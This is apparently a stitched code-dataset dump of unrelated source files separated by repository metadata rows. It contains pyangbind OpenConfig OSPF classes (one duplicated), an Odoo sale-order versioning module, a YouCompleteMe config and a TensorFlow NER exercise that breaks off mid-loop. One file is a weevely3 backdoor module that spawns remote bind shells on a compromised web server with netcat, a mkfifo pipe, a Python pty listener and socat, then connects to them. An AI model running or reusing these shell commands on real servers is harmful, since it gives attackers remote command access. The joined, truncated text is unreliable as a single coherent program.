YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__state")
_yang_name = "prefix-sid"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"opaque-lsa",
"extended-prefix",
"tlvs",
"tlv",
"prefix-sid",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/state (container)
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
_pyangbind_elements = OrderedDict([("state", state)])
from . import state
class prefix_sid(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/opaque-lsa/extended-prefix/tlvs/tlv/prefix-sid. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__state")
_yang_name = "prefix-sid"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"opaque-lsa",
"extended-prefix",
"tlvs",
"tlv",
"prefix-sid",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/state (container)
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
_pyangbind_elements = OrderedDict([("state", state)])
| apache-2.0 | -17,502,674,820,547,928 | 36.345345 | 375 | 0.571727 | false |
dhp-denero/LibrERP | sale_order_version/sale.py | 1 | 6008 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2004-2012 Pexego Sistemas Informáticos. All Rights Reserved
# $Alejandro Núñez Liz$
# $Omar Castiñeira Saavedra$
#
# Copyright (C) 2014 Didotech srl (<http://www.didotech.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from tools import ustr
class sale_order_line(orm.Model):
_inherit = "sale.order.line"
_columns = {
#'active': fields.related('order_id', 'active', type='boolean', string='Active', store=False),
'sale_line_copy_id': fields.many2one('sale.order.line', 'Orig version', required=False, readonly=False),
}
def copy_data(self, cr, uid, line_id, defaults=None, context=None):
defaults = defaults or {}
defaults['sale_line_copy_id'] = line_id
return super(sale_order_line, self).copy_data(cr, uid, line_id, defaults, context)
def copy(self, cr, uid, line_id, defaults, context=None):
defaults = defaults or {}
defaults['sale_line_copy_id'] = line_id
return super(sale_order_line, self).copy(cr, uid, line_id, defaults, context)
class sale_order(orm.Model):
""" Modificaciones de sale order para añadir la posibilidad de versionar el pedido de venta. """
_inherit = "sale.order"
def action_previous_version(self, cr, uid, ids, default=None, context=None):
if not default:
default = {}
if not context:
context = {}
attachment_obj = self.pool['ir.attachment']
orders = self.browse(cr, uid, ids, context=context)
order_ids = []
for order in orders:
vals = {
'version': (order.version and order.version or 1) + 1,
}
if not order.sale_version_id:
vals['sale_version_id'] = order.id
context['versioning'] = True
vals['name'] = (order.sale_version_id and order.sale_version_id.name or order.name) + u" V." + ustr(vals['version'])
new_order_id = self.copy(cr, uid, order.id, vals, context=context)
attachment_ids = attachment_obj.search(cr, uid, [('res_model', '=', 'sale.order'), ('res_id', '=', order.id)])
if attachment_ids:
attachment_obj.write(cr, uid, attachment_ids, {'res_id': new_order_id, 'res_name': vals['name']})
order.write({'active': False})
order_ids.append(new_order_id)
mod_obj = self.pool['ir.model.data']
res = mod_obj.get_object_reference(cr, uid, 'sale', 'view_order_form')
res_id = res and res[1] or False,
return {
'name': 'Sale Order',
'view_type': 'form',
'view_mode': 'form',
'view_id': res_id,
'res_model': 'sale.order',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'current',
'res_id': order_ids and order_ids[0] or False,
}
def _get_version_ids(self, cr, uid, ids, field_name, arg, context=None):
if context is None:
context = {}
res = {}
for sale in self.browse(cr, uid, ids):
if sale.sale_version_id:
res[sale.id] = self.search(cr, uid, ['|', ('sale_version_id', '=', sale.sale_version_id.id), ('id', '=', sale.sale_version_id.id), ('version', '<', sale.version), '|', ('active', '=', False), ('active', '=', True)])
else:
res[sale.id] = []
return res
_columns = {
'sale_version_id': fields.many2one('sale.order', 'Orig version', required=False, readonly=False),
'version': fields.integer('Version no.', readonly=True),
'active': fields.boolean('Active', readonly=False, help="It indicates that the sales order is active."),
'version_ids': fields.function(_get_version_ids, method=True, type="one2many", relation='sale.order', string='Versions', readonly=True)
}
_defaults = {
'active': True,
'version': 0,
'name': '/',
}
def create(self, cr, uid, vals, context=None):
if vals.get('name', '/') == '/':
shop = self.pool['sale.shop'].browse(cr, uid, vals['shop_id'], context=context)
if shop and shop.sequence_id:
sequence = self.pool['ir.sequence'].next_by_id(cr, uid, shop.sequence_id.id)
vals.update({'name': sequence})
else:
sequence = self.pool['ir.sequence'].get(cr, uid, 'sale.order')
vals.update({'name': sequence})
if (not context or not context.get('versioning', False)) and vals.get('sale_version_id', False):
del vals['sale_version_id']
vals['version'] = 0
return super(sale_order, self).create(cr, uid, vals, context)
class sale_shop(orm.Model):
_inherit = 'sale.shop'
_columns = {
'sequence_id': fields.many2one('ir.sequence', 'Entry Sequence', help="This field contains the informatin related to the numbering of the Sale Orders.", domain="[('code', '=', 'sale.order')]"),
}
| agpl-3.0 | 3,669,966,839,879,994,000 | 41.274648 | 231 | 0.558387 | false |
doragasu/mw-wflash | src/.ycm_extra_conf.py | 1 | 6247 | # This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# You 100% do NOT need -DUSE_CLANG_COMPLETER in your flags; only the YCM
# source code needs it.
'-DUSE_CLANG_COMPLETER',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=gnu99',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c',
'-m68000',
'-isystem',
'../BoostParts',
'-isystem',
'../llvm/include',
'-isystem',
'../llvm/tools/clang/include',
'-I',
'.',
'-I',
'./ClangCompleter',
'-I',
'./Config'
'-isystem',
'./tests/gmock/gtest',
'-isystem',
'./tests/gmock/gtest/include',
'-isystem',
'./tests/gmock',
'-isystem',
'./tests/gmock/include',
# Include file for MD related stuff
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
| gpl-3.0 | -4,638,745,777,331,748,000 | 32.586022 | 80 | 0.702097 | false |
epinna/weevely3 | modules/backdoor/tcp.py | 1 | 3727 | from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
from core.module import Module
from core.loggers import log
from core import messages
import urllib.parse
import telnetlib
import time
class Tcp(Module):
"""Spawn a shell on a TCP port."""
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
ShellCmd(
"nc -l -p ${port} -e ${shell}",
name = 'netcat',
target = Os.NIX,
background = True
),
ShellCmd(
"rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc -l ${port} >/tmp/f; rm -rf /tmp/f",
name = 'netcat_bsd',
target = Os.NIX,
background = True
),
ShellCmd(
"""python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", ${port}));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("${shell}");s.close()';""",
name = 'python_pty',
target = Os.NIX,
background = True
),
ShellCmd(
"""socat tcp-l:${port} exec:${shell}""",
name = 'socat',
target = Os.NIX,
background = True
)
]
)
self.register_arguments([
{ 'name' : 'port', 'help' : 'Port to spawn', 'type' : int },
{ 'name' : '-shell', 'help' : 'Specify shell', 'default' : '/bin/sh' },
{ 'name' : '-no-autoconnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
{ 'name' : '-vector', 'choices' : self.vectors.get_names() }
])
def run(self):
# Run all the vectors
for vector in self.vectors:
# Skip vector if -vector is specified but does not match
if self.args.get('vector') and self.args.get('vector') != vector.name:
continue
# Background run does not return results
vector.run(self.args)
# If set, skip autoconnect
if self.args.get('no_autoconnect'): continue
# Give some time to spawn the shell
time.sleep(1)
urlparsed = urllib.parse.urlparse(self.session['url'])
if not urlparsed.hostname:
log.debug(
messages.module_backdoor_tcp.error_parsing_connect_s % self.args['port']
)
continue
try:
telnetlib.Telnet(urlparsed.hostname, self.args['port'], timeout = 5).interact()
# If telnetlib does not rise an exception, we can assume that
# ended correctly and return from `run()`
return
except Exception as e:
log.debug(
messages.module_backdoor_tcp.error_connecting_to_s_s_s % (
urlparsed.hostname,
self.args['port'],
e
)
)
# If autoconnect was expected but Telnet() calls worked,
# prints error message
if not self.args.get('no_autoconnect'):
log.warn(
messages.module_backdoor_tcp.error_connecting_to_s_s_s % (
urlparsed.hostname,
self.args['port'],
'remote port not open or unreachable'
)
)
| gpl-3.0 | -6,986,358,487,308,145,000 | 32.881818 | 270 | 0.473303 | false |
ds-hwang/deeplearning_udacity | cs224d_nlp/assignment2_dev/q2_NER.py | 1 | 15598 | import os
import getpass
import sys
import time
import numpy as np
import tensorflow as tf
from q2_initialization import xavier_weight_init
import data_utils.utils as du
import data_utils.ner as ner
from utils import data_iterator
from model import LanguageModel
class Config(object):
"""Holds model hyperparams and data information.
The config class is used to store various hyperparameters and dataset
information parameters. Model objects are passed a Config() object at
instantiation.
"""
embed_size = 50
batch_size = 64
label_size = 5
hidden_size = 100
max_epochs = 24
early_stopping = 2
dropout = 0.9
lr = 0.001
l2 = 0.001
window_size = 3
class NERModel(LanguageModel):
"""Implements a NER (Named Entity Recognition) model.
This class implements a deep network for named entity recognition. It
inherits from LanguageModel, which has an add_embedding method in addition to
the standard Model method.
"""
def load_data(self, debug=False):
"""Loads starter word-vectors and train/dev/test data."""
# Load the starter word vectors
self.wv, word_to_num, num_to_word = ner.load_wv(
'data/ner/vocab.txt', 'data/ner/wordVectors.txt')
tagnames = ['O', 'LOC', 'MISC', 'ORG', 'PER']
self.num_to_tag = dict(enumerate(tagnames))
tag_to_num = {v:k for k,v in self.num_to_tag.iteritems()}
# Load the training set
docs = du.load_dataset('data/ner/train')
self.X_train, self.y_train = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
if debug:
self.X_train = self.X_train[:1024]
self.y_train = self.y_train[:1024]
# Load the dev set (for tuning hyperparameters)
docs = du.load_dataset('data/ner/dev')
self.X_dev, self.y_dev = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
if debug:
self.X_dev = self.X_dev[:1024]
self.y_dev = self.y_dev[:1024]
# Load the test set (dummy labels only)
docs = du.load_dataset('data/ner/test.masked')
self.X_test, self.y_test = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
def add_placeholders(self):
"""Generate placeholder variables to represent the input tensors
These placeholders are used as inputs by the rest of the model building
code and will be fed data during training. Note that when "None" is in a
placeholder's shape, it's flexible
Adds following nodes to the computational graph
input_placeholder: Input placeholder tensor of shape
(None, window_size), type tf.int32
labels_placeholder: Labels placeholder tensor of shape
(None, label_size), type tf.float32
dropout_placeholder: Dropout value placeholder (scalar),
type tf.float32
Add these placeholders to self as the instance variables
self.input_placeholder
self.labels_placeholder
self.dropout_placeholder
(Don't change the variable names)
"""
### YOUR CODE HERE
self.input_placeholder = tf.placeholder(
tf.int32, shape=[None, self.config.window_size], name='Input')
self.labels_placeholder = tf.placeholder(
tf.float32, shape=[None, self.config.label_size], name='Target')
self.dropout_placeholder = tf.placeholder(tf.float32, name='Dropout')
### END YOUR CODE
def create_feed_dict(self, input_batch, dropout, label_batch=None):
"""Creates the feed_dict for softmax classifier.
A feed_dict takes the form of:
feed_dict = {
<placeholder>: <tensor of values to be passed for placeholder>,
....
}
Hint: The keys for the feed_dict should be a subset of the placeholder
tensors created in add_placeholders.
Hint: When label_batch is None, don't add a labels entry to the feed_dict.
Args:
input_batch: A batch of input data.
label_batch: A batch of label data.
Returns:
feed_dict: The feed dictionary mapping from placeholders to values.
"""
### YOUR CODE HERE
feed_dict = {
self.input_placeholder: input_batch,
}
if label_batch is not None:
feed_dict[self.labels_placeholder] = label_batch
if dropout is not None:
feed_dict[self.dropout_placeholder] = dropout
### END YOUR CODE
return feed_dict
def add_embedding(self):
"""Add embedding layer that maps from vocabulary to vectors.
Creates an embedding tensor (of shape (len(self.wv), embed_size). Use the
input_placeholder to retrieve the embeddings for words in the current batch.
(Words are discrete entities. They need to be transformed into vectors for use
in deep-learning. Although we won't do so in this problem, in practice it's
useful to initialize the embedding with pre-trained word-vectors. For this
problem, using the default initializer is sufficient.)
Hint: This layer should use the input_placeholder to index into the
embedding.
Hint: You might find tf.nn.embedding_lookup useful.
Hint: See following link to understand what -1 in a shape means.
https://www.tensorflow.org/versions/r0.8/api_docs/python/array_ops.html#reshape
Hint: Check the last slide from the TensorFlow lecture.
Hint: Here are the dimensions of the variables you will need to create:
L: (len(self.wv), embed_size)
Returns:
window: tf.Tensor of shape (-1, window_size*embed_size)
"""
# The embedding lookup is currently only implemented for the CPU
with tf.device('/cpu:0'):
### YOUR CODE HERE
embedding = tf.get_variable('Embedding', [len(self.wv), self.config.embed_size])
window = tf.nn.embedding_lookup(embedding, self.input_placeholder)
window = tf.reshape(
window, [-1, self.config.window_size * self.config.embed_size])
### END YOUR CODE
return window
def add_model(self, window):
"""Adds the 1-hidden-layer NN.
Hint: Use a variable_scope (e.g. "Layer") for the first hidden layer, and
another variable_scope (e.g. "Softmax") for the linear transformation
preceding the softmax. Make sure to use the xavier_weight_init you
defined in the previous part to initialize weights.
Hint: Make sure to add in regularization and dropout to this network.
Regularization should be an addition to the cost function, while
dropout should be added after both variable scopes.
Hint: You might consider using a tensorflow Graph Collection (e.g
"total_loss") to collect the regularization and loss terms (which you
will add in add_loss_op below).
Hint: Here are the dimensions of the various variables you will need to
create
W: (window_size*embed_size, hidden_size)
b1: (hidden_size,)
U: (hidden_size, label_size)
b2: (label_size)
https://www.tensorflow.org/versions/r0.7/api_docs/python/framework.html#graph-collections
Args:
window: tf.Tensor of shape (-1, window_size*embed_size)
Returns:
output: tf.Tensor of shape (batch_size, label_size)
"""
### YOUR CODE HERE
with tf.variable_scope('Layer1', initializer=xavier_weight_init()) as scope:
W = tf.get_variable(
'W', [self.config.window_size * self.config.embed_size,
self.config.hidden_size])
b1 = tf.get_variable('b1', [self.config.hidden_size])
h = tf.nn.tanh(tf.matmul(window, W) + b1)
if self.config.l2:
tf.add_to_collection('total_loss', 0.5 * self.config.l2 * tf.nn.l2_loss(W))
with tf.variable_scope('Layer2', initializer=xavier_weight_init()) as scope:
U = tf.get_variable('U', [self.config.hidden_size, self.config.label_size])
b2 = tf.get_variable('b2', [self.config.label_size])
y = tf.matmul(h, U) + b2
if self.config.l2:
tf.add_to_collection('total_loss', 0.5 * self.config.l2 * tf.nn.l2_loss(U))
output = tf.nn.dropout(y, self.dropout_placeholder)
### END YOUR CODE
return output
def add_loss_op(self, y):
"""Adds cross_entropy_loss ops to the computational graph.
Hint: You can use tf.nn.softmax_cross_entropy_with_logits to simplify your
implementation. You might find tf.reduce_mean useful.
Args:
pred: A tensor of shape (batch_size, n_classes)
Returns:
loss: A 0-d tensor (scalar)
"""
### YOUR CODE HERE
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(y, self.labels_placeholder))
tf.add_to_collection('total_loss', cross_entropy)
loss = tf.add_n(tf.get_collection('total_loss'))
### END YOUR CODE
return loss
def add_training_op(self, loss):
"""Sets up the training Ops.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train. See
https://www.tensorflow.org/versions/r0.7/api_docs/python/train.html#Optimizer
for more information.
Hint: Use tf.train.AdamOptimizer for this model.
Calling optimizer.minimize() will return a train_op object.
Args:
loss: Loss tensor, from cross_entropy_loss.
Returns:
train_op: The Op for training.
"""
### YOUR CODE HERE
optimizer = tf.train.AdamOptimizer(self.config.lr)
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
### END YOUR CODE
return train_op
def __init__(self, config):
"""Constructs the network using the helper functions defined above."""
self.config = config
self.load_data(debug=False)
self.add_placeholders()
window = self.add_embedding()
y = self.add_model(window)
self.loss = self.add_loss_op(y)
self.predictions = tf.nn.softmax(y)
one_hot_prediction = tf.argmax(self.predictions, 1)
correct_prediction = tf.equal(
tf.argmax(self.labels_placeholder, 1), one_hot_prediction)
self.correct_predictions = tf.reduce_sum(tf.cast(correct_prediction, 'int32'))
self.train_op = self.add_training_op(self.loss)
def run_epoch(self, session, input_data, input_labels,
shuffle=True, verbose=True):
orig_X, orig_y = input_data, input_labels
dp = self.config.dropout
# We're interested in keeping track of the loss and accuracy during training
total_loss = []
total_correct_examples = 0
total_processed_examples = 0
total_steps = len(orig_X) / self.config.batch_size
for step, (x, y) in enumerate(
data_iterator(orig_X, orig_y, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=shuffle)):
feed = self.create_feed_dict(input_batch=x, dropout=dp, label_batch=y)
loss, total_correct, _ = session.run(
[self.loss, self.correct_predictions, self.train_op],
feed_dict=feed)
total_processed_examples += len(x)
total_correct_examples += total_correct
total_loss.append(loss)
##
if verbose and step % verbose == 0:
sys.stdout.write('\r{} / {} : loss = {}'.format(
step, total_steps, np.mean(total_loss)))
sys.stdout.flush()
if verbose:
sys.stdout.write('\r')
sys.stdout.flush()
return np.mean(total_loss), total_correct_examples / float(total_processed_examples)
def predict(self, session, X, y=None):
"""Make predictions from the provided model."""
# If y is given, the loss is also calculated
# We deactivate dropout by setting it to 1
dp = 1
losses = []
results = []
if np.any(y):
data = data_iterator(X, y, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=False)
else:
data = data_iterator(X, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=False)
for step, (x, y) in enumerate(data):
feed = self.create_feed_dict(input_batch=x, dropout=dp)
if np.any(y):
feed[self.labels_placeholder] = y
loss, preds = session.run(
[self.loss, self.predictions], feed_dict=feed)
losses.append(loss)
else:
preds = session.run(self.predictions, feed_dict=feed)
predicted_indices = preds.argmax(axis=1)
results.extend(predicted_indices)
return np.mean(losses), results
def print_confusion(confusion, num_to_tag):
"""Helper method that prints confusion matrix."""
# Summing top to bottom gets the total number of tags guessed as T
total_guessed_tags = confusion.sum(axis=0)
# Summing left to right gets the total number of true tags
total_true_tags = confusion.sum(axis=1)
print
print confusion
for i, tag in sorted(num_to_tag.items()):
prec = confusion[i, i] / float(total_guessed_tags[i])
recall = confusion[i, i] / float(total_true_tags[i])
print 'Tag: {} - P {:2.4f} / R {:2.4f}'.format(tag, prec, recall)
def calculate_confusion(config, predicted_indices, y_indices):
"""Helper method that calculates confusion matrix."""
confusion = np.zeros((config.label_size, config.label_size), dtype=np.int32)
for i in xrange(len(y_indices)):
correct_label = y_indices[i]
guessed_label = predicted_indices[i]
confusion[correct_label, guessed_label] += 1
return confusion
def save_predictions(predictions, filename):
"""Saves predictions to provided file."""
with open(filename, "wb") as f:
for prediction in predictions:
f.write(str(prediction) + "\n")
def test_NER():
"""Test NER model implementation.
You can use this function to test your implementation of the Named Entity
Recognition network. When debugging, set max_epochs in the Config object to 1
so you can rapidly iterate.
"""
config = Config()
with tf.Graph().as_default():
model = NERModel(config)
init = tf.initialize_all_variables()
saver = tf.train.Saver()
with tf.Session() as session:
best_val_loss = float('inf')
best_val_epoch = 0
session.run(init)
for epoch in xrange(config.max_epochs):
